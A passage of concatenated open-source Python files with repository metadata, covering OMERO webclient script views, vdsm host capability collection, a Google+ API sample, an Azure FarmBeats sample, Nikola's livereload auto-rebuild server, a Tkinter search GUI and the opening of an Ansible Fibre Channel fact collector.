logger.debug("Invalid entry for '%s' : %s" % (key, v))
continue
if isinstance(obj, omero.model.IObject):
valueList.append(omero.rtypes.robject(obj))
else:
valueList.append(obj)
inputMap[key] = omero.rtypes.rlist(valueList)
# Handle other rtypes: String, Long, Int etc.
else:
value = request.POST[key]
if len(value) == 0:
continue
try:
inputMap[key] = pclass(value)
except:
logger.debug("Invalid entry for '%s' : %s" % (key, value))
continue
# If we have objects specified via 'IDs' and 'DataType', try to pick
# correct group
if 'IDs' in inputMap.keys() and 'Data_Type' in inputMap.keys():
gid = conn.SERVICE_OPTS.getOmeroGroup()
conn.SERVICE_OPTS.setOmeroGroup('-1')
try:
firstObj = conn.getObject(
inputMap['Data_Type'].val, unwrap(inputMap['IDs'])[0])
newGid = firstObj.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(newGid)
except Exception, x:
logger.debug(traceback.format_exc())
# if inputMap values not as expected or firstObj is None
conn.SERVICE_OPTS.setOmeroGroup(gid)
try:
# Try/except in case inputs are not serializable, e.g. unicode
logger.debug("Running script %s with "
"params %s" % (scriptName, inputMap))
except:
pass
rsp = run_script(request, conn, sId, inputMap, scriptName)
return JsonResponse(rsp)
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
"""
Uses the scripting service (Batch Image Export script) to generate
OME-TIFF for an image and attach this as a file annotation to the image.
Script will show up in the 'Activities' for users to monitor and download
result etc.
"""
scriptService = conn.getScriptService()
sId = scriptService.getScriptID(
"/omero/export_scripts/Batch_Image_Export.py")
image = conn.getObject("Image", imageId)
if image is not None:
gid = image.getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
imageIds = [long(imageId)]
inputMap = {'Data_Type': wrap('Image'), 'IDs': wrap(imageIds)}
inputMap['Format'] = wrap('OME-TIFF')
rsp = run_script(
request, conn, sId, inputMap, scriptName='Create OME-TIFF')
return JsonResponse(rsp)
def run_script(request, conn, sId, inputMap, scriptName='Script'):
"""
Starts running a script, adding details to the request.session so that it
shows up in the webclient Activities panel and results are available there
etc.
"""
request.session.modified = True
scriptService = conn.getScriptService()
try:
handle = scriptService.runScript(
sId, inputMap, None, conn.SERVICE_OPTS)
# E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp -h 10.37.129.2 -p 53154:tcp -h 10.211.55.2 -p 53154:tcp -h 10.12.1.230 -p 53154 # noqa
jobId = str(handle)
status = 'in progress'
request.session['callback'][jobId] = {
'job_type': "script",
'job_name': scriptName,
'start_time': datetime.datetime.now(),
'status': status}
request.session.modified = True
except Exception, x:
jobId = str(time()) # E.g. 1312803670.6076391
if x.message and x.message.startswith("No processor available"):
# omero.ResourceError
logger.info(traceback.format_exc())
error = "No Processor Available"
status = 'no processor available'
message = "" # template displays message and link
else:
logger.error(traceback.format_exc())
error = traceback.format_exc()
status = 'failed'
message = x.message
# save the error to http session, for display in 'Activities' window
request.session['callback'][jobId] = {
'job_type': "script",
'job_name': scriptName,
'start_time': datetime.datetime.now(),
'status': status,
'Message': message,
'error': error}
return {'status': status, 'error': error}
return {'jobId': jobId, 'status': status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
"""
Query to see if we have an OME-TIFF attached to the image (assume only 1,
since Batch Image Export will delete old ones)
"""
# Any existing OME-TIFF will appear in list
links = list(conn.getAnnotationLinks(
"Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF))
rv = {}
if len(links) > 0:
# use highest ID === most recent
links.sort(key=lambda x: x.getId(), reverse=True)
annlink = links[0]
created = annlink.creationEventDate()
annId = annlink.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
download = reverse("download_annotation", args=[annId])
rv = {"created": str(created), "ago": ago(created), "id": annId,
"download": download}
return rv # will get returned as json by default
| dpwrussell/openmicroscopy | components/tools/OmeroWeb/omeroweb/webclient/views.py | Python | gpl-2.0 | 172,591 |
"""
[email protected]
"""
from __future__ import print_function, unicode_literals, absolute_import, division
from .ssim import ssim
| maweigert/gputools | gputools/metrics/__init__.py | Python | bsd-3-clause | 134 |
#
# Copyright 2011 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Refer to the README and COPYING files for full details of the license
#
"""Collect host capabilities"""
import os
from xml.dom import minidom
import subprocess
import logging
import time
import struct
import socket
import itertools
import libvirt
from config import config
import libvirtconnection
import dsaversion
import netinfo
import hooks
import utils
import constants
import storage.hba
class OSName:
UNKNOWN = 'unknown'
OVIRT = 'RHEV Hypervisor'
RHEL = 'RHEL'
class CpuInfo(object):
def __init__(self):
"""Parse /proc/cpuinfo"""
self._info = {}
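        # Maps processor index (as a string) to a dict of that processor's
        # /proc/cpuinfo fields, e.g. {'0': {'model name': ..., 'flags': ...}}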
p = {}
for line in file('/proc/cpuinfo'):
if line.strip() == '':
p = {}
continue
key, value = map(str.strip, line.split(':', 1))
if key == 'processor':
self._info[value] = p
else:
p[key] = value
def cores(self):
return len(self._info)
def sockets(self):
phys_ids = [ p.get('physical id', '0') for p in self._info.values() ]
return len(set(phys_ids))
def flags(self):
return self._info.itervalues().next()['flags'].split()
def mhz(self):
return self._info.itervalues().next()['cpu MHz']
def model(self):
return self._info.itervalues().next()['model name']
@utils.memoized
def _getEmulatedMachines():
c = libvirtconnection.get()
caps = minidom.parseString(c.getCapabilities())
guestTag = caps.getElementsByTagName('guest')
# Guest element is missing if kvm modules are not loaded
if len(guestTag) == 0:
return []
guestTag = guestTag[0]
return [ m.firstChild.toxml() for m in guestTag.getElementsByTagName('machine') ]
@utils.memoized
def _getCompatibleCpuModels():
c = libvirtconnection.get()
cpu_map = minidom.parseString(
file('/usr/share/libvirt/cpu_map.xml').read())
allModels = [ m.getAttribute('name') for m
in cpu_map.getElementsByTagName('arch')[0].childNodes
if m.nodeName == 'model' ]
def compatible(model):
xml = '<cpu match="minimum"><model>%s</model></cpu>' % model
return c.compareCPU(xml, 0) in (
libvirt.VIR_CPU_COMPARE_SUPERSET,
libvirt.VIR_CPU_COMPARE_IDENTICAL)
return [ 'model_' + model for model
in allModels if compatible(model) ]
def _parseKeyVal(lines, delim='='):
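    # E.g. lines ['VERSION=6.2', 'RELEASE = 3.0'] -> {'VERSION': '6.2', 'RELEASE': '3.0'}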
d = {}
for line in lines:
kv = line.split(delim, 1)
if len(kv) != 2:
continue
k, v = map(str.strip, kv)
d[k] = v
return d
def _getIscsiIniName():
try:
return _parseKeyVal(
file('/etc/iscsi/initiatorname.iscsi') )['InitiatorName']
except:
logging.error('reporting empty InitiatorName', exc_info=True)
return ''
def getos():
if os.path.exists('/etc/rhev-hypervisor-release'):
return OSName.OVIRT
elif os.path.exists('/etc/redhat-release'):
return OSName.RHEL
else:
return OSName.UNKNOWN
__osversion = None
def osversion():
global __osversion
if __osversion is not None:
return __osversion
version = release = ''
osname = getos()
try:
if osname == OSName.OVIRT:
d = _parseKeyVal( file('/etc/default/version') )
version = d.get('VERSION', '')
release = d.get('RELEASE', '')
else:
p = subprocess.Popen([constants.EXT_RPM, '-qf', '--qf',
'%{VERSION} %{RELEASE}\n', '/etc/redhat-release'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=True)
out, err = p.communicate()
if p.returncode == 0:
version, release = out.splitlines()[-1].split()
except:
logging.error('failed to find version/release', exc_info=True)
__osversion = dict(release=release, version=version, name=osname)
return __osversion
def get():
caps = {}
caps['kvmEnabled'] = \
str(config.getboolean('vars', 'fake_kvm_support') or
os.path.exists('/dev/kvm')).lower()
cpuInfo = CpuInfo()
caps['cpuCores'] = str(cpuInfo.cores())
caps['cpuSockets'] = str(cpuInfo.sockets())
caps['cpuSpeed'] = cpuInfo.mhz()
if config.getboolean('vars', 'fake_kvm_support'):
caps['cpuModel'] = 'Intel(Fake) CPU'
flags = set(cpuInfo.flags() + ['vmx', 'sse2', 'nx'])
        caps['cpuFlags'] = ','.join(flags) + ',model_486,model_pentium,' \
            'model_pentium2,model_pentium3,model_pentiumpro,model_qemu32,' \
            'model_coreduo,model_core2duo,model_n270,model_Conroe,' \
            'model_Penryn,model_Nehalem,model_Opteron_G1'
else:
caps['cpuModel'] = cpuInfo.model()
caps['cpuFlags'] = ','.join(cpuInfo.flags() +
_getCompatibleCpuModels())
caps.update(dsaversion.version_info)
caps.update(netinfo.get())
try:
caps['hooks'] = hooks.installed()
except:
logging.debug('not reporting hooks', exc_info=True)
caps['operatingSystem'] = osversion()
caps['uuid'] = utils.getHostUUID()
caps['packages2'] = _getKeyPackages()
caps['emulatedMachines'] = _getEmulatedMachines()
caps['ISCSIInitiatorName'] = _getIscsiIniName()
caps['HBAInventory'] = storage.hba.HBAInventory()
caps['vmTypes'] = ['kvm']
caps['memSize'] = str(utils.readMemInfo()['MemTotal'] / 1024)
caps['reservedMem'] = str(
config.getint('vars', 'host_mem_reserve') +
config.getint('vars', 'extra_mem_reserve') )
caps['guestOverhead'] = config.get('vars', 'guest_ram_overhead')
return caps
def _getIfaceByIP(addr):
remote = struct.unpack('I', socket.inet_aton(addr))[0]
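    # /proc/net/route lists Destination and Mask as hex in host byte order,
    # matching the unpacked value above; return the first interface whose
    # masked network contains 'addr'.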
for line in itertools.islice(file('/proc/net/route'), 1, None):
iface, dest, gateway, flags, refcnt, use, metric, \
mask, mtu, window, irtt = line.split()
dest = int(dest, 16)
mask = int(mask, 16)
if remote & mask == dest & mask:
return iface
return '' # should never get here w/ default gw
def _getKeyPackages():
def kernelDict():
try:
ver, rel = file('/proc/sys/kernel/osrelease').read(). \
strip().split('-', 1)
except:
logging.error('kernel release not found', exc_info=True)
ver, rel = '0', '0'
try:
t = file('/proc/sys/kernel/version').read().split()[2:]
del t[4] # Delete timezone
t = time.mktime(time.strptime(' '.join(t)))
except:
logging.error('kernel build time not found', exc_info=True)
t = '0'
return dict(version=ver, release=rel, buildtime=t)
KEY_PACKAGES = ['qemu-kvm', 'qemu-img',
'vdsm', 'spice-server', 'libvirt']
pkgs = {'kernel': kernelDict()}
try:
for pkg in KEY_PACKAGES:
rc, out, err = utils.execCmd([constants.EXT_RPM, '-q', '--qf',
'%{NAME}\t%{VERSION}\t%{RELEASE}\t%{BUILDTIME}\n', pkg],
sudo=False)
if rc: continue
line = out[-1]
n, v, r, t = line.split()
pkgs[pkg] = dict(version=v, release=r, buildtime=t)
except:
        logging.error('package version query failed', exc_info=True)
return pkgs
| openSUSE/vdsm | vdsm/caps.py | Python | gpl-2.0 | 8,208 |
#!/usr/bin/env python
# http://oscon.com/oscon2012/public/schedule/detail/24416
# plus_a.py (by Wesley Chun under CC-SA3.0 license)
import os
import httplib2
from apiclient import discovery
from oauth2client import file as storage, client, tools
import settings  # assumed local config module defining AUTH_FILE, CLIENT_ID, CLIENT_SECRET, SCOPE, USER_AGENT
store = storage.Storage(settings.AUTH_FILE)
credz = store.get() if os.path.exists(settings.AUTH_FILE) else None
if not credz:
flow = client.OAuth2WebServerFlow(
client_id=settings.CLIENT_ID,
client_secret=settings.CLIENT_SECRET,
scope=settings.SCOPE,
user_agent=settings.USER_AGENT,
)
credz = tools.run(flow, store)
access = credz.authorize(httplib2.Http())
service = discovery.build('plus', 'v1', http=access)
print '\n*** Get user status (authorization required)'
data = service.activities().list(userId='me', maxResults=1,
collection='public').execute()['items'][0]
print '''
User: %s
Date: %s
Post: %s''' % (
data['actor']['displayName'], data['updated'],
' '.join(data['title'].strip().split())
)
| YuxuanLing/trunk | trunk/code/study/python/core_python_appilication/ch15/plus_a.py | Python | gpl-3.0 | 1,067 |
class Solution(object):
def searchInsert(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
lo, hi = 0, len(nums) - 1
while lo <= hi:
mid = (lo + hi) // 2
if target < nums[mid]: hi = mid - 1
elif target > nums[mid]: lo = mid + 1
else: return mid
#print(lo, hi, mid)
return lo
def searchInsert2(self, nums, target):
L, R = 0, len(nums) - 1
while L < R:
M = (L + R) // 2
if nums[M] < target:
L = M + 1
else:
R = M
print(L, R, M)
return L + 1 if nums[L] < target else L
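# For reference: the standard library's bisect module provides the same
# semantics (illustrative sketch, not part of the original solutions):
#
#   import bisect
#   bisect.bisect_left([1, 3, 5, 6], 7)   # -> 4, same result as searchInsert above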
test = Solution()
print(test.searchInsert([1,3,5,6], 7))
print(test.searchInsert2([1,3,5,6], 7))
| rx2130/Leetcode | python/35 Search Insert Position.py | Python | apache-2.0 | 833 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
FILE: sample_hello_world.py
DESCRIPTION:
This sample demonstrates the most basic operation that can be
performed - creation of a Farmer. Use this to understand how to
create the client object, how to authenticate it, and make sure
your client is set up correctly to call into your FarmBeats endpoint.
USAGE:
```python sample_hello_world.py```
Set the environment variables with your own values before running the sample:
- `AZURE_TENANT_ID`: The tenant ID of your active directory application.
- `AZURE_CLIENT_ID`: The client ID of your active directory application.
- `AZURE_CLIENT_SECRET`: The client secret of your active directory application.
- `FARMBEATS_ENDPOINT`: The FarmBeats endpoint that you want to run these samples on.
"""
from azure.identity import DefaultAzureCredential
from azure.agrifood.farming import FarmBeatsClient
from azure.agrifood.farming.models import Farmer
import os
from dotenv import load_dotenv
def sample_hello_world():
farmbeats_endpoint = os.environ['FARMBEATS_ENDPOINT']
credential = DefaultAzureCredential()
client = FarmBeatsClient(
endpoint=farmbeats_endpoint,
credential=credential
)
farmer_id = "contoso-farmer"
farmer_name = "Contoso"
farmer_description = "Contoso is hard working."
print("Creating farmer, or updating if farmer already exists...", end=" ", flush=True)
farmer = client.farmers.create_or_update(
farmer_id=farmer_id,
farmer=Farmer(
name=farmer_name,
description=farmer_description
)
)
print("Done")
print("Here are the details of the farmer:")
print(f"\tID: {farmer.id}")
print(f"\tName: {farmer.name}")
print(f"\tDescription: {farmer.description}")
print(f"\tCreated timestamp: {farmer.created_date_time}")
print(f"\tLast modified timestamp: {farmer.modified_date_time}")
if __name__ == "__main__":
load_dotenv()
sample_hello_world()
| Azure/azure-sdk-for-python | sdk/agrifood/azure-agrifood-farming/samples/sample_hello_world.py | Python | mit | 2,076 |
# -*- coding: utf-8 -*-
# Copyright © 2012-2016 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Automatic rebuilds for Nikola."""
from __future__ import print_function
import json
import mimetypes
import os
import re
import subprocess
import sys
import time
try:
from urlparse import urlparse
from urllib2 import unquote
except ImportError:
from urllib.parse import urlparse, unquote # NOQA
import webbrowser
from wsgiref.simple_server import make_server
import wsgiref.util
import pkg_resources
from blinker import signal
try:
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import WSGIServer, WebSocketWSGIRequestHandler, WebSocketWSGIHandler
from ws4py.server.wsgiutils import WebSocketWSGIApplication
from ws4py.messaging import TextMessage
except ImportError:
WebSocket = object
try:
import watchdog
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler, PatternMatchingEventHandler
except ImportError:
watchdog = None
FileSystemEventHandler = object
PatternMatchingEventHandler = object
from nikola.plugin_categories import Command
from nikola.utils import dns_sd, req_missing, get_logger, get_theme_path, STDERR_HANDLER
LRJS_PATH = os.path.join(os.path.dirname(__file__), 'livereload.js')
error_signal = signal('error')
refresh_signal = signal('refresh')
ERROR_N = '''<html>
<head>
</head>
<body>
ERROR {}
</body>
</html>
'''
class CommandAuto(Command):
"""Automatic rebuilds for Nikola."""
name = "auto"
logger = None
has_server = True
doc_purpose = "builds and serves a site; automatically detects site changes, rebuilds, and optionally refreshes a browser"
dns_sd = None
cmd_options = [
{
'name': 'port',
'short': 'p',
'long': 'port',
'default': 8000,
'type': int,
            'help': 'Port number (default: 8000)',
},
{
'name': 'address',
'short': 'a',
'long': 'address',
'type': str,
'default': '127.0.0.1',
'help': 'Address to bind (default: 127.0.0.1 -- localhost)',
},
{
'name': 'browser',
'short': 'b',
'long': 'browser',
'type': bool,
'help': 'Start a web browser',
'default': False,
},
{
'name': 'ipv6',
'short': '6',
'long': 'ipv6',
'default': False,
'type': bool,
'help': 'Use IPv6',
},
{
'name': 'no-server',
'long': 'no-server',
'default': False,
'type': bool,
'help': 'Disable the server, automate rebuilds only'
},
]
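    # Illustrative invocations (flags correspond to cmd_options above; values
    # are examples only):
    #   nikola auto --address 0.0.0.0 --port 8001 --browser
    #   nikola auto --no-server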
def _execute(self, options, args):
"""Start the watcher."""
self.logger = get_logger('auto', STDERR_HANDLER)
LRSocket.logger = self.logger
if WebSocket is object and watchdog is None:
req_missing(['ws4py', 'watchdog'], 'use the "auto" command')
elif WebSocket is object:
req_missing(['ws4py'], 'use the "auto" command')
elif watchdog is None:
req_missing(['watchdog'], 'use the "auto" command')
self.cmd_arguments = ['nikola', 'build']
if self.site.configuration_filename != 'conf.py':
self.cmd_arguments.append('--conf=' + self.site.configuration_filename)
# Run an initial build so we are up-to-date
subprocess.call(self.cmd_arguments)
port = options and options.get('port')
self.snippet = '''<script>document.write('<script src="http://'
+ (location.host || 'localhost').split(':')[0]
+ ':{0}/livereload.js?snipver=1"></'
+ 'script>')</script>
</head>'''.format(port)
# Do not duplicate entries -- otherwise, multiple rebuilds are triggered
watched = set([
'templates/'
] + [get_theme_path(name) for name in self.site.THEMES])
for item in self.site.config['post_pages']:
watched.add(os.path.dirname(item[0]))
for item in self.site.config['FILES_FOLDERS']:
watched.add(item)
for item in self.site.config['GALLERY_FOLDERS']:
watched.add(item)
for item in self.site.config['LISTINGS_FOLDERS']:
watched.add(item)
for item in self.site._plugin_places:
watched.add(item)
# Nikola itself (useful for developers)
watched.add(pkg_resources.resource_filename('nikola', ''))
out_folder = self.site.config['OUTPUT_FOLDER']
if options and options.get('browser'):
browser = True
else:
browser = False
if options['ipv6']:
dhost = '::'
else:
dhost = None
host = options['address'].strip('[').strip(']') or dhost
# Server can be disabled (Issue #1883)
self.has_server = not options['no-server']
# Instantiate global observer
observer = Observer()
if self.has_server:
# Watch output folders and trigger reloads
observer.schedule(OurWatchHandler(self.do_refresh), out_folder, recursive=True)
# Watch input folders and trigger rebuilds
for p in watched:
if os.path.exists(p):
observer.schedule(OurWatchHandler(self.do_rebuild), p, recursive=True)
# Watch config file (a bit of a hack, but we need a directory)
_conf_fn = os.path.abspath(self.site.configuration_filename or 'conf.py')
_conf_dn = os.path.dirname(_conf_fn)
observer.schedule(ConfigWatchHandler(_conf_fn, self.do_rebuild), _conf_dn, recursive=False)
try:
self.logger.info("Watching files for changes...")
observer.start()
except KeyboardInterrupt:
pass
parent = self
class Mixed(WebSocketWSGIApplication):
"""A class that supports WS and HTTP protocols on the same port."""
def __call__(self, environ, start_response):
if environ.get('HTTP_UPGRADE') is None:
return parent.serve_static(environ, start_response)
return super(Mixed, self).__call__(environ, start_response)
if self.has_server:
ws = make_server(
host, port, server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=Mixed(handler_cls=LRSocket)
)
ws.initialize_websockets_manager()
self.logger.info("Serving HTTP on {0} port {1}...".format(host, port))
if browser:
if options['ipv6'] or '::' in host:
server_url = "http://[{0}]:{1}/".format(host, port)
else:
server_url = "http://{0}:{1}/".format(host, port)
self.logger.info("Opening {0} in the default web browser...".format(server_url))
                # Yes, this is racy
                webbrowser.open(server_url)
try:
self.dns_sd = dns_sd(port, (options['ipv6'] or '::' in host))
ws.serve_forever()
except KeyboardInterrupt:
self.logger.info("Server is shutting down.")
if self.dns_sd:
self.dns_sd.Reset()
# This is a hack, but something is locking up in a futex
# and exit() doesn't work.
os.kill(os.getpid(), 15)
else:
# Workaround: can’t have nothing running (instant exit)
# but also can’t join threads (no way to exit)
# The joys of threading.
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.logger.info("Shutting down.")
# This is a hack, but something is locking up in a futex
# and exit() doesn't work.
os.kill(os.getpid(), 15)
def do_rebuild(self, event):
"""Rebuild the site."""
# Move events have a dest_path, some editors like gedit use a
# move on larger save operations for write protection
event_path = event.dest_path if hasattr(event, 'dest_path') else event.src_path
fname = os.path.basename(event_path)
if (fname.endswith('~') or
fname.startswith('.') or
'__pycache__' in event_path or
event_path.endswith(('.pyc', '.pyo', '.pyd')) or
os.path.isdir(event_path)): # Skip on folders, these are usually duplicates
return
self.logger.info('REBUILDING SITE (from {0})'.format(event_path))
p = subprocess.Popen(self.cmd_arguments, stderr=subprocess.PIPE)
error = p.stderr.read()
errord = error.decode('utf-8')
if p.wait() != 0:
self.logger.error(errord)
error_signal.send(error=errord)
else:
print(errord)
def do_refresh(self, event):
"""Refresh the page."""
# Move events have a dest_path, some editors like gedit use a
# move on larger save operations for write protection
event_path = event.dest_path if hasattr(event, 'dest_path') else event.src_path
self.logger.info('REFRESHING: {0}'.format(event_path))
p = os.path.relpath(event_path, os.path.abspath(self.site.config['OUTPUT_FOLDER']))
refresh_signal.send(path=p)
def serve_static(self, environ, start_response):
"""Trivial static file server."""
uri = wsgiref.util.request_uri(environ)
p_uri = urlparse(uri)
f_path = os.path.join(self.site.config['OUTPUT_FOLDER'], *[unquote(x) for x in p_uri.path.split('/')])
# ‘Pretty’ URIs and root are assumed to be HTML
mimetype = 'text/html' if uri.endswith('/') else mimetypes.guess_type(uri)[0] or 'application/octet-stream'
if os.path.isdir(f_path):
if not p_uri.path.endswith('/'): # Redirect to avoid breakage
start_response('301 Moved Permanently', [('Location', p_uri.path + '/')])
return []
f_path = os.path.join(f_path, self.site.config['INDEX_FILE'])
mimetype = 'text/html'
if p_uri.path == '/robots.txt':
start_response('200 OK', [('Content-type', 'text/plain; charset=UTF-8')])
return ['User-Agent: *\nDisallow: /\n'.encode('utf-8')]
elif os.path.isfile(f_path):
with open(f_path, 'rb') as fd:
if mimetype.startswith('text/') or mimetype.endswith('+xml'):
start_response('200 OK', [('Content-type', "{0}; charset=UTF-8".format(mimetype))])
else:
start_response('200 OK', [('Content-type', mimetype)])
return [self.file_filter(mimetype, fd.read())]
elif p_uri.path == '/livereload.js':
with open(LRJS_PATH, 'rb') as fd:
start_response('200 OK', [('Content-type', mimetype)])
return [self.file_filter(mimetype, fd.read())]
start_response('404 ERR', [])
return [self.file_filter('text/html', ERROR_N.format(404).format(uri).encode('utf-8'))]
def file_filter(self, mimetype, data):
"""Apply necessary changes to document before serving."""
if mimetype == 'text/html':
data = data.decode('utf8')
data = self.remove_base_tag(data)
data = self.inject_js(data)
data = data.encode('utf8')
return data
def inject_js(self, data):
"""Inject livereload.js."""
data = re.sub('</head>', self.snippet, data, 1, re.IGNORECASE)
return data
def remove_base_tag(self, data):
"""Comment out any <base> to allow local resolution of relative URLs."""
        data = re.sub(r'<base\s([^>]*)>', r'<!--base \g<1>-->', data, flags=re.IGNORECASE)
return data
pending = []
class LRSocket(WebSocket):
"""Speak Livereload protocol."""
def __init__(self, *a, **kw):
"""Initialize protocol handler."""
refresh_signal.connect(self.notify)
error_signal.connect(self.send_error)
super(LRSocket, self).__init__(*a, **kw)
def received_message(self, message):
"""Handle received message."""
message = json.loads(message.data.decode('utf8'))
self.logger.info('<--- {0}'.format(message))
response = None
if message['command'] == 'hello': # Handshake
response = {
'command': 'hello',
'protocols': [
'http://livereload.com/protocols/official-7',
],
'serverName': 'nikola-livereload',
}
elif message['command'] == 'info': # Someone connected
self.logger.info('****** Browser connected: {0}'.format(message.get('url')))
self.logger.info('****** sending {0} pending messages'.format(len(pending)))
while pending:
msg = pending.pop()
self.logger.info('---> {0}'.format(msg.data))
self.send(msg, msg.is_binary)
else:
response = {
'command': 'alert',
'message': 'HEY',
}
if response is not None:
response = json.dumps(response)
self.logger.info('---> {0}'.format(response))
response = TextMessage(response)
self.send(response, response.is_binary)
def notify(self, sender, path):
"""Send reload requests to the client."""
p = os.path.join('/', path)
message = {
'command': 'reload',
'liveCSS': True,
'path': p,
}
response = json.dumps(message)
self.logger.info('---> {0}'.format(p))
response = TextMessage(response)
if self.stream is None: # No client connected or whatever
pending.append(response)
else:
self.send(response, response.is_binary)
def send_error(self, sender, error=None):
"""Send reload requests to the client."""
if self.stream is None: # No client connected or whatever
return
message = {
'command': 'alert',
'message': error,
}
response = json.dumps(message)
response = TextMessage(response)
if self.stream is None: # No client connected or whatever
pending.append(response)
else:
self.send(response, response.is_binary)
class OurWatchHandler(FileSystemEventHandler):
"""A Nikola-specific handler for Watchdog."""
def __init__(self, function):
"""Initialize the handler."""
self.function = function
super(OurWatchHandler, self).__init__()
def on_any_event(self, event):
"""Call the provided function on any event."""
self.function(event)
class ConfigWatchHandler(FileSystemEventHandler):
"""A Nikola-specific handler for Watchdog that handles the config file (as a workaround)."""
def __init__(self, configuration_filename, function):
"""Initialize the handler."""
self.configuration_filename = configuration_filename
self.function = function
def on_any_event(self, event):
"""Call the provided function on any event."""
if event._src_path == self.configuration_filename:
self.function(event)
try:
# Monkeypatch to hide Broken Pipe Errors
f = WebSocketWSGIHandler.finish_response
if sys.version_info[0] == 3:
EX = BrokenPipeError # NOQA
else:
EX = IOError
def finish_response(self):
"""Monkeypatched finish_response that ignores broken pipes."""
try:
f(self)
except EX: # Client closed the connection, not a real error
pass
WebSocketWSGIHandler.finish_response = finish_response
except NameError:
# In case there is no WebSocketWSGIHandler because of a failed import.
pass
| wcmckee/nikola | nikola/plugins/command/auto/__init__.py | Python | mit | 17,275 |
from tkinter import *
from tkinter.filedialog import *
from tkinter.messagebox import *
from .binary import *
from .linear import *
"""
This file contains the searches GUI
"""
class SearchesGui(Tk):
"""
Searches GUI for Libuseful
"""
def __init__(self, *args, **kwargs):
"""
Create the GUI elements.
"""
Tk.__init__(self, *args, **kwargs)
self.title("Searches")
self.left_frame = Frame(self)
self.left_frame.pack(side=LEFT)
self.right_frame = Frame(self)
self.right_frame.pack(side=RIGHT)
self.items = Listbox(self.left_frame)
self.items.pack()
self.file_field = Entry(self.right_frame)
self.file_field.pack()
self.file_load_button = Button(self.right_frame, text = "Load File", command = self.loadfile)
self.file_load_button.pack()
self.file_choose_button = Button(self.right_frame, text = "Pick File", command = self.pickfile)
self.file_choose_button.pack()
self.to_search_field = Entry(self.right_frame)
self.to_search_field.pack()
self.bsearch_button = Button(self.right_frame, text = "Binary search", command = self.do_bsearch)
self.bsearch_button.pack()
self.lsearch_button = Button(self.right_frame, text = "Linear search", command = self.do_lsearch)
self.lsearch_button.pack()
self.mainloop()
def loadfile(self):
"""
Load a file into the GUI.
"""
f = open(self.file_field.get())
self.litems = [i[:-1] for i in f.readlines()]
self.litems.sort()
for i in self.litems:
self.items.insert(END, i)
f.close()
def pickfile(self):
"""
Pick a file to load into the GUI.
"""
x = askopenfilename()
if x == '':
return
self.file_field.delete(0, END)
self.file_field.insert(0, x)
def do_bsearch(self):
"""
Perform binary search.
"""
self.loadfile()
self.items.selection_clear(0, END)
x = binary_search(self.litems, self.to_search_field.get())[0]
        if x == -1:
            showwarning("", "That item wasn't found.")
            return
self.items.selection_set(x)
self.items.see(x)
def do_lsearch(self):
"""
Perform linear search.
"""
self.loadfile()
self.items.selection_clear(0, END)
x = linear_search(self.litems, self.to_search_field.get())[0]
        if x == -1:
            showwarning("", "That item wasn't found.")
            return
self.items.selection_set(x)
self.items.see(x)
def main():
"""
Run the GUI.
"""
SearchesGui()
if __name__ == '__main__':
main()
| jcotton42/libuseful | searches/gui.py | Python | gpl-3.0 | 2,865 |
# Fibre Channel WWN initiator related facts collection for ansible.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import glob
from ansible.module_utils.facts.utils import get_file_lines
from ansible.module_utils.facts.collector import BaseFactCollector
class FcWwnInitiatorFactCollector(BaseFactCollector):
name = 'fibre_channel_wwn'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
"""
Example contents /sys/class/fc_host/*/port_name:
0x21000014ff52a9bb
"""
fc_facts = {}
fc_facts['fibre_channel_wwn'] = []
if sys.platform.startswith('linux'):
for fcfile in glob.glob('/sys/class/fc_host/*/port_name'):
for line in get_file_lines(fcfile):
